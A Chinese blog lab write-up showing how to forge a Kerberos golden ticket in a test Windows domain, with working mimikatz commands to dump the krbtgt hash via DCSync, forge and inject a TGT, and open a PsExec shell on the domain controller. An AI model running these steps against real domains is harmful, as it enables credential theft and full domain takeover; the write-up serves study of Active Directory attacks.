伪造黄金票据实验

最新推荐文章于 2024-04-15 00:48:49 发布
最新推荐文章于 2024-04-15 00:48:49 发布
阅读量607 收藏 2
点赞数
分类专栏: 实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GG_iii/article/details/108646320
版权

0x01 实验准备

实验工具:

  • PsExec64工具是内网渗透中的免杀渗透利器。

  • mimikatz_trunk工具的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码,还可以提升进程权限、注入进程、读取进程内存等等。

实验环境:
  • Windows server 2008 作为域控制器,域为 yuming.com
  • Windows 7 作为 yuming域下的一台设备

0x02 黄金票据条件

  1. 域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot]
  2. 域的SID 值[AD PowerShell模块:(Get-ADDomain).DomainSID.Value]
  3. 域的KRBTGT账户NTLM密码哈希
  4. 伪造用户名

0x03 实验步骤

1. 获取域控制器的 krbtgt 哈希值
在域控制器上操作:

通过 mimikatz 输入命令获取 ktbtgt 的哈希值:lsadump::dcsync /domain:test.com /user:krbtgt
也可以通过wce、gethashes等方式获取。
在这里插入图片描述

2. 伪造票据(低权限域用户在客户端上伪造)
在 yuming域下的设备(Windows 7)上操作:

得到 KRBTGT HASH 之后使用 mimikatz 中的 kerberos::golden 功能生成金票 golden.kiribi,即为伪造成功的TGT。

参数说明:

/admin:伪造的用户名
/domain:域名称
/sid:SID 值,域的SID
/krbtgt:krbtgt 的 NTLM-HASH 值
/ticket:生成的票据名称
生成金票命令:kerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-593020204-2933201490-533286667 /krbtgt:8894a0f0182bff68e84bd7ba767ac8ed /ticket:golden.kiribi
在这里插入图片描述
在这里插入图片描述

3. 获取权限
在 yuming域下的设备(Windows 7)上操作:

清空本地票据缓存,导入伪造的票据
查看本地保存的票据,观察Client name:kerberos::list
清理本地票据缓存:kerberos::purge
导入伪造的黄金票据:kerberos::ptt golden.kiribi
查看本地保存的票据,观察Client name:kerberos::list
票据20分钟内有效,过期之后可以再次导入
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4. 利用伪造的黄金票据
在 yuming域下的设备(Windows 7)上操作:

直接利用psexec.exe远程登录和执行命令
Whoami显示当前用户为 yuming域的administrator用户
PsExec.exe \域控计算机名 cmd.exe
在这里插入图片描述

GoKing1
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSRF漏洞的靶场实验
09-19
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的网络安全漏洞,它允许攻击者在用户已登录且浏览器保持会话状态的情况下,诱使用户执行非本意的操作。在“CSRF漏洞的靶场实验”中,我们将通过实际操作...
黄金白银票据伪造
gental_z的博客
01-04 2476
黄金白银票据伪造 域内协议Kerberos ​ 在域环境中,一般使用Kerberos来作为身份认证的一种协议。其实NTLM协议也存在于域环境中。两种协议共存,针对不同的协议,也就有了不同的攻击方式。 传统的Kerberos认证模型 ​ 首先来介绍一下Kerberos认证的模型: ​ 在Kerberos认证环境下,主要存在三种角色,分别为客户端、服务端以及KDC即密钥分发中心。在域环境中,KDC存在于DC上面。客户端想要访问服务端上的某些服务,首先需要向KDC申请一张TGT票据,然后使用此票据去申请访问目标
内网渗透:三、Kerberos协议及票据黄金和白银)伪造
liu_jia_liang的博客
02-20 3477
一、Kerberos协议 kerberos(Secure network authentication system)中文叫网络安全认证系统 kerberos在进行认证过程中并不会传输用户的密码,而是通过传输tickets(票据)进行认证登陆到LDAP server。Kerberos协议主要用于计算机网络的身份鉴别,其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的凭证(ticket-granting-ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和S
域权限维持—黄金票据和白金票据
最新发布
lza20001103的博客
04-15 502
域权限维持—黄金票据和白金票据
算法知识——哈希算法(hash)
热门推荐
Geoffrey_Zflyee的博客
03-16 5万+
哈希(hash)算法 哈希算法并不是一个特定的算法而是一类算法的统称。哈希算法也叫散列算法,一般来说满足这样的关系:f(data)=key,输入任意长度的data数据,经过哈希算法处理后输出一个定长的数据key。 哈希算法最重要的两条性质,就是不可逆和无冲突。 如果是一个data数据集,经过哈希算法处理后得到key的数据集,然后将keys与原始数据进行一一映射就得到了一个哈希...
域权限维持-黄金/白银票据详解
good good study
04-19 2024
在域环境中进行权限维持,谈的比较多的便是票据,分为白银票据黄金票据, 其原理都是基于Kerberos认证。黄金票据伪造的是域管下发给用户的TGT,而白银票据则是伪造的 ST。
内网渗透--CS伪造黄金票据与白银票据
Armandhe的博客
06-24 3441
性感作者,在线翻车
PHP伪造referer实例代码
10-30
然后,使用 `fsockopen` 函数连接目标主机,并构建伪造的 Referer 信息,包括 `Host`、`Referer` 和 `User-Agent`。 模拟 HTTP 请求 代码使用 `fputs` 函数将伪造的 Referer 信息发送到目标主机,并模拟一个 GET ...
深度伪造与检测技术综述
04-18
限性。针对本领域的综述工作还比较缺乏,只有针对早期图像篡改工作的一些总结[4][5],亟需对现有工作进 行系统的整理和科学... 本文首先在第1 节中介绍深度伪造的各种相关技术,在第2 节中列举了当下深度伪造研究的数据
php使用curl伪造浏览器访问操作示例
10-16
首先,我们需要了解为什么需要伪造浏览器访问。在某些情况下,比如爬虫或者自动化测试,我们可能需要让服务器认为请求来自真实的浏览器,而不是程序。这可以通过设置cURL选项来实现,特别是通过设置`User-Agent`头,...
服务伪造和中间人攻击.
04-03
服务伪造基本描述.中间人攻击的种类,在我上传的PPT中.
伪造IP协议头 易语言
05-06
用协议头欺骗服务器,来造成伪造IP地址的效果!
令牌伪造工具sharptoken .net framework 4.0版本
01-31
该工具是beicheng大佬所写的令牌伪造工具,github地址:https://github.com/BeichenDream/SharpToken,但是所编译的版本是.net framework 3.5,实际在实战过程中,该工具基本都是在server服务器上使用,并没有安装...
php curl 伪造IP来源的实例代码
10-27
php curl 太强大了,它不但可以模仿用户登录,还可以模仿用户IP地址哦,为伪造IP来源,本实例仅供参考哦
php漏洞之跨网站请求伪造与防止伪造方法
10-26
跨站请求伪造(Cross-Site Request Forgery,简称CSRF)是一种网络安全漏洞,攻击者通过诱导用户在未经许可的情况下执行非预期的操作,从而达到恶意目的。在PHP开发中,了解并防止这种攻击至关重要。 首先,我们...
易语言伪造请求ip 伪造请求ip 网页访问伪造ip
03-09
易语言伪造网页访问ip地址 结合HTTP扩展请求头 X-Forwarded-For 可以对客户端IP进行伪造 X-Forwarded-For 是一个 HTTP 扩展头部,用来表示HTTP请求端真实 IP,HTTP/1.1 协议并没有对它的定义,但现如今X-Forwarded-...
哈希算法
weixin_30577801的博客
01-21 1583
对于哈希算法,在我们平时的开发中,都是基本上拿来就用就行了,所以这节我们将重点放在如何使用,并不进行哈希算法的原理剖析和如何设计一个哈希算法的讲解. 什么是哈希算法? 将任意长度的二进制值串映射为固定长度的二进制值串,这个映射的规则就是哈希算法,而通过原始数据映射之后得到的二进制值串就是哈希值(散列值).一个优秀的哈希算法需要满足: 从哈希值不能反...
伪造TGT黄金票据
深蓝旭的博客
02-07 768
通过上一篇文章我们初步了解了Kerberos协议的工作过程,解决的两个问题 第一个问题:如何证明你本人是XXX用户的问题 由Authentication Server负责第二个问题:提供服务的服务器如何知道你有权限访问它提供的服务。当一个Client去访问Server服务器上的某服务时,Server如何判断Client是否有权限来访问自己主机上的服务。 由Ticket Granting Server负责针对Kerberos协议需要解决的第一个问题:如何证明你本人是XXX用户的问题。攻击者提出了...
黄金白银票据伪造以及ms14-068的使用(域渗透)
weixin_45612728的博客
02-06 3483
以下实验使用到的软件有mimikatz和psexec软件.使用的到的pc有一台win7的计算机和一台域控的08服务器.注意:win7的计算机以普通的域用户添加到cyh.com域环境中.08服务器的ip地址为:192.168.0.222,dns:192.168.0.222,网关:192.168.0.2 1. 黄金票据伪造 黄金票据其实就是伪造tgt的,关于什么是tgt请看我之前的博客,tgt也有人称是通票. 实验步骤: 1.1前提 需要域的sid和tgt的hahs值 1.2 获取域控的的hash值,需要在域
transformer 深度伪造检测
02-18
深度伪造检测是指通过深度学习模型来检测和识别图像或视频中的伪造内容。在深度伪造检测中,Transformer模型可以用于对图像或视频进行编码和解码,从而捕捉到输入数据中的关键特征和上下文信息。通过对比输入数据与...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值